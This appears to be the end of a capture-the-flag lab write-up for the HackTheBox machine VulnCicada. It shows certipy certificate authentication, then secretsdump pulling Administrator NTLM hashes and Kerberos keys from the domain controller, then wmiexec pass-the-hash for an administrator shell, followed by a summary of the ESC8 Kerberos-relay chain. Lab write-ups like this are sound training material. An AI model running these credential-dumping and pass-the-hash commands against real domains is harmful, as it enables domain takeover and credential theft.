└─$ certipy-ad auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
This TGT can be used to dump hashes from the DC:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ KRB5CCNAME=dc-jpq225.ccache secretsdump.py -k -no-pass cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a
Administrator:aes128-cts-hmac-sha1-96:926e5da4d5cd0be6e1cea21769bb35a4
Administrator:des-cbc-md5:fd2a29621f3e7604
[*] Cleaning up...
Now we can use this hash to get an Administrator shell:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ wmiexec.py cicada.vl/administrator@dc-jpq225.cicada.vl -k -hashes :85a0da53871a9d56b6cd05deda3a5e87
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
Description
VulnCicada is a mid-level Windows AD machine: after discovering an image with a hidden password on a public NFS share, that password was used to identify a CA vulnerable to ESC8, which was exploited with Kerberos relay to bypass self-relay restrictions, obtain machine account credentials, and then dump the Administrator hash and take over the entire domain.